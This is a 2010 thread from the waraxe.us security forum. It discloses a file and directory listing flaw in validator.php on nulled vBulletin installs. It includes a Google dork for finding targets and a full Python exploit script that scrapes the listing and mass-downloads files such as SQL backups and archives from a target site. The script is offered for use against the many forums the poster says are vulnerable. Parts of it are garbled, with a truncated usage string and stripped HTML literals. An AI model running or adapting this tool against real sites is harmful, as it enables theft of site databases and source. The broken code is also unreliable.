Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 29, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 857
Members: 0
Total: 857
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> vBulletin nulled full disclosure
Post new topic  Reply to topic View previous topic :: View next topic 
vBulletin nulled full disclosure
PostPosted: Fri Jan 22, 2010 8:39 am Reply with quote
VERTIGO
Advanced user
Advanced user
 
Joined: Sep 25, 2008
Posts: 87




Code:


*\-----------------------------------------------------------------------------/*
             ____        _ _      _   _       (nulled)
            |  _ \      | | |    | | (_)
      __   _| |_) |_   _| | | ___| |_ _ _ __
      \ \ / /  _ <| | | | | |/ _ \ __| | '_ \
       \ V /| |_) | |_| | | |  __/ |_| | | | |
        \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|
                        Full disclosure...

*\-----------------------------------------------------------------------------/*

Name: vBulletin nulled (validator.php) files/directories disclosure
Author: TinKode
Date: 19-01-2010
Dork: "inurl:validator.php"

*\-----------------------------------------------------------------------------/*

Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin i
nstalled...

*\-----------------------------------------------------------------------------/*

Exploit: http://www.website.com/vB_forum/validator.php

*\-----------------------------------------------------------------------------/*

Note: Work on many nulled versions (maybe all)

*\-----------------------------------------------------------------------------/*

Copyrights: http://tinkode.baywords.com

*\-----------------------------------------------------------------------------/*

Greetz: http://www.insecurity.ro

*\-----------------------------------------------------------------------------/*
View user's profile Send private message
PostPosted: Fri Jan 22, 2010 10:55 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




This is old like me.Smile))))
View user's profile Send private message
PostPosted: Fri Jan 22, 2010 6:08 pm Reply with quote
VERTIGO
Advanced user
Advanced user
 
Joined: Sep 25, 2008
Posts: 87




Maybe old but now posted in public if its too old and you know it why you not post it before
View user's profile Send private message
PostPosted: Fri Jan 22, 2010 6:20 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Such vulnerability can be useful Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jan 22, 2010 6:25 pm Reply with quote
VERTIGO
Advanced user
Advanced user
 
Joined: Sep 25, 2008
Posts: 87




Many forums like i see are vuln to these
View user's profile Send private message
PostPosted: Fri Jan 22, 2010 6:29 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




VERTIGO wrote:
Maybe old but now posted in public if its too old and you know it why you not post it before


Posted 2-3 years ago dude.A'm not reposter.Smile
View user's profile Send private message
PostPosted: Fri Jan 22, 2010 6:35 pm Reply with quote
VERTIGO
Advanced user
Advanced user
 
Joined: Sep 25, 2008
Posts: 87




http://www.securityfocus.com/archive/1/509061

The datum of these Jan 20 2010

Maybe these is reported before but now i come with these and posted to inform for these vuln because there are many forums out vuln on these
View user's profile Send private message
PostPosted: Sun Jan 24, 2010 1:33 pm Reply with quote
VERTIGO
Advanced user
Advanced user
 
Joined: Sep 25, 2008
Posts: 87






Code:
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

import os, sys, urllib.request, urllib.parse, threading

def main():
    logo = """
\t |---------------------------------------------------------------|
\t |                 ____        _ _      _   _     (TM)           |
\t |                |  _ \      | | |    | | (_)                   |
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               |
\t |          \ \ / /  _  all                          |
         |        vbfd.py download name.jpg -> one                       |
         |---------------------------------------------------------------|"""
    if sys.platform in ("linux", "linux2"):
        clearing = "clear"
    else:
        clearing = "cls"
    os.system(clearing)
    print(logo)
    args = sys.argv
    if len(args) == 3:
        try:
            print("Please wait...")
            if args[1] == "scan":
                extract_parse_save(args[2].strip("/"))
            elif args[1] == "download":
                download_data(args[2])
        except Exception as message:
            print("An error occurred: {}".format(message))
        except:
            print("Unknown error.")
        else:
            print("Ready!")
    else:
        print(usage)
    input()

def extract_parse_save(url):
    print("[+]Extracting content...")
    hurl = url + "/validator.php"
    with urllib.request.urlopen(hurl) as usock:
        source = usock.read().decode()
    print("[+]Finding token...")
    word = "validate('"
    source = source[source.index(word) + len(word):]
    value = source[:source.index("'")]
    print("[+]Obtaining paths...")
    hurl = url + "/validator.php?op={}".format(value)
    with urllib.request.urlopen(hurl) as usock:
        lastk, lastv = None, None
        dictionary = dict()
        for line in usock:
            line = line.decode()
            index = line.find("
")
            if index != -1:
                lastk = line[index + 4:line.index("

")].strip(" ")
            index = line.find("")
            if index != -1:
                lastv = line[index + 8:line.index("")].strip(" ")
            if lastk != None and lastv != None:
                index = lastk.rfind(".")
                if index in (-1, 0):
                    lastk = "[other] {}".format(lastk)
                else:
                    lastk = "[{}] {}".format(lastk[index + 1:], lastk)
                dictionary[lastk] = lastv
                lastk, lastv = None, None
    print("[+]Organizing and saving paths...")
    with open("vBlogs.txt", "w") as fout:
        fout.write(url + "\n")
        keys = sorted(dictionary.keys())
        for key in keys:
            fout.write("{} ({})\n".format(key, dictionary[key]))

def download_data(files):
    print("[+]Searching and downloading files...")
    mthreads = 50
    with open("vBlogs.txt", "r") as fin:
        url = fin.readline().strip("\n")
        if files.find("*") == -1:
            hurl = url + "/" + files.strip("/")
            Download(hurl).start()
        else:
            ext = files[files.rindex(".") + 1:]
            for line in fin:
                pieces = line.strip("\n").split(" ")
                if pieces[0].count(ext) == 1:
                    upath = pieces[1]
                    hurl = url + "/" + upath.strip("/")
                    while threading.active_count() > mthreads:
                        pass
                    Download(hurl).start()
    while threading.active_count() > 1:
        pass

class Download(threading.Thread):

    def __init__(self, url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        try:
            with urllib.request.urlopen(self.url) as usock:
                data = usock.read()
                uparser = urllib.parse.urlparse(usock.geturl())
                pieces = uparser.path.split("/")
                fname = pieces[len(pieces) - 1]
                with open(fname, "wb") as fout:
                    fout.write(data)
        except:
            pass

if __name__ == "__main__":
    main()
View user's profile Send private message
vBulletin nulled full disclosure
  www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.172 Seconds